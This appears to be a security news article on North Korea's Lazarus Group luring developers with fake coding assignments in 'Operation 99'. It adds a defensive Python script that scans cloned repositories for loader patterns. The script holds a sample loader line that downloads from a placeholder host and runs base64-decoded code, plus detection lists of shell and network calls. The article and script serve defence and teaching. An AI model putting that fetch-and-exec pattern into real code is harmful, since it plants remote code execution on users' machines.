
Lazarus Group Targets Developers in a New Data Theft Campaign


The Lazarus Group, a North Korean state-sponsored threat actor, has been observed targeting software developers in a new campaign, according to researchers at SecurityScorecard. The campaign, tracked as ‘Operation 99’, aims to steal sensitive data from developer environments, including source code, secrets, configuration files, and cryptocurrency wallet keys.

The researchers note that the campaign marks a shift in tactics for the group, from broad phishing to targeted attacks on developers in the technology supply chain. The malware has also been upgraded, with stronger obfuscation and a more modular, adaptable design. Victims have been identified worldwide.

The overarching goal of this campaign is to generate revenue for the Democratic People’s Republic of Korea (DPRK) regime. By targeting developers, the attackers indirectly threaten the projects and enterprises supported by these developers, making it an effective method of supply chain attack.

The campaign focuses in particular on freelance developers working in the cryptocurrency sector. The attackers pose as recruiters on platforms such as LinkedIn and offer coding assignments as part of a fake hiring process. Victims are asked to clone a GitHub repository containing a malicious project; once run, it contacts command-and-control servers hosted on infrastructure belonging to Stark Industries Solutions Ltd. That infrastructure delivers second-stage payloads to the victim’s machine, using heavily obfuscated Python scripts to evade detection.

The malware is multi-stage and modular: a downloader retrieves further payloads, and separate implants handle keylogging, clipboard monitoring, file exfiltration, and browser credential theft. By embedding malware into developer workflows, the attackers compromise not only the individual victim but also the projects and systems that victim contributes to.

SecurityScorecard urges organizations to adopt proactive controls for the developer ecosystem. Its recommendations include verifying code repositories before cloning or running them, deploying endpoint security capable of detecting obfuscated scripts and second-stage loaders, verifying recruiters and job offers on platforms such as LinkedIn, and training developers to recognize red flags in emails, repositories, and profiles.
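The attack chain described above (a cloned repository that reaches out to command-and-control and runs obfuscated Python) and the recommendation to verify repositories before running them can be turned into a concrete pre-run check. The script below is an added example written for this page; it is not SecurityScorecard’s tooling and not code from the campaign. It parses Python files with the standard `ast` module and flags the generic shape of a first-stage loader: `exec()`/`eval()` of decoded or runtime-built data, network and process calls, long high-entropy string literals, and `package.json` install hooks that run before anyone reads the code. The loader snippet it scans is constructed to mimic that decode-then-exec shape, and the URL in it is a placeholder.

```python
"""Pre-run triage of a repository received from an unverified recruiter.

Added example, not SecurityScorecard's tooling and not Operation 99 code.
It flags the generic shape of a first-stage loader so a developer looks
before running anything; hits are leads for manual review, not verdicts.
"""
import ast
import json
import math
import sys
from pathlib import Path

# Call names that commonly appear in a first-stage Python loader.
EXEC_FUNCS = {"exec", "eval", "compile"}
DECODE_FUNCS = {"b64decode", "b32decode", "a85decode", "decompress", "unhexlify"}
NET_FUNCS = {"urlopen", "get", "post", "create_connection", "connect"}
SHELL_FUNCS = {"system", "popen", "Popen", "check_output"}
# Files Python tooling executes implicitly (pip install, pytest, import).
IMPLICIT_RUN = {"setup.py", "conftest.py", "sitecustomize.py", "__main__.py"}


def shannon_entropy(s: str) -> float:
    """Bits per character: English text is ~4, base64/random blobs ~5.5 and up."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _call_name(node: ast.Call) -> str:
    """Bare function name for foo(...) or obj.foo(...), else empty string."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def scan_python_source(src: str, filename: str = "<string>") -> list:
    """Return human-readable findings for one Python file (empty list if clean)."""
    findings = []
    try:
        tree = ast.parse(src, filename)
    except SyntaxError as e:
        return [f"{filename}: does not parse ({e.msg}); inspect manually"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            # exec()/eval() whose argument is not a plain literal: code built at runtime.
            if name in EXEC_FUNCS and node.args and not isinstance(node.args[0], ast.Constant):
                inner = {_call_name(n) for n in ast.walk(node.args[0]) if isinstance(n, ast.Call)}
                if inner & DECODE_FUNCS:
                    findings.append(f"{filename}:{node.lineno}: {name}() of decoded/decompressed data")
                else:
                    findings.append(f"{filename}:{node.lineno}: {name}() of runtime-built code")
            elif name in NET_FUNCS:
                findings.append(f"{filename}:{node.lineno}: network call {name}()")
            elif name in SHELL_FUNCS:
                findings.append(f"{filename}:{node.lineno}: shell/process call {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Long, high-entropy literals are the usual home of an encoded stage.
            s = node.value
            if len(s) >= 200 and shannon_entropy(s) > 4.5:
                findings.append(f"{filename}:{node.lineno}: {len(s)}-char high-entropy string literal")
    return findings


def scan_install_hooks(repo: Path) -> list:
    """Flag npm lifecycle scripts that run automatically on `npm install`."""
    findings = []
    pkg = repo / "package.json"
    if pkg.is_file():
        try:
            scripts = json.loads(pkg.read_text()).get("scripts", {}) or {}
        except (json.JSONDecodeError, AttributeError):
            return [f"package.json: unparseable; inspect manually"]
        for hook in ("preinstall", "install", "postinstall", "prepare"):
            if hook in scripts:
                findings.append(f"package.json: {hook} hook runs `{scripts[hook]}`")
    return findings


def scan_repo(repo_dir: str) -> list:
    """Walk a cloned repository and collect all findings."""
    repo = Path(repo_dir)
    findings = scan_install_hooks(repo)
    for path in repo.rglob("*.py"):
        rel = str(path.relative_to(repo))
        if path.name in IMPLICIT_RUN:
            findings.append(f"{rel}: executes implicitly (install/test/import); read it first")
        findings.extend(scan_python_source(path.read_text(errors="replace"), rel))
    return findings


# Constructed stand-in for a loader (not real campaign code): fetch, decode, exec.
SAMPLE_LOADER = (
    "import base64, urllib.request\n"
    "blob = urllib.request.urlopen('http://example.invalid/p').read()\n"
    "exec(base64.b64decode(blob))\n"
)
SAMPLE_CLEAN = "def add(a, b):\n    return a + b\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = scan_repo(sys.argv[1])  # usage: python triage.py path/to/cloned/repo
    else:
        hits = scan_python_source(SAMPLE_LOADER, "loader.py") + scan_python_source(SAMPLE_CLEAN, "clean.py")
    print("\n".join(hits) if hits else "no findings")
```

Run it against the cloned directory before opening the project in an IDE or running `npm install` / `pip install -e .`, since both execute code before any review happens. A clean scan is not proof of safety (a loader can hide in a native dependency, a CI script, or a build tool configuration), so treat the output as the start of a review, and do the review in a disposable VM rather than on a workstation holding SSH keys, tokens, or wallet files.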

Overall, Operation 99 highlights how state-sponsored threat actors are adapting their tactics to target developers directly, and underlines the need for robust controls to protect intellectual property and digital assets. Developers must remain vigilant and proactive in safeguarding their systems against such threats.
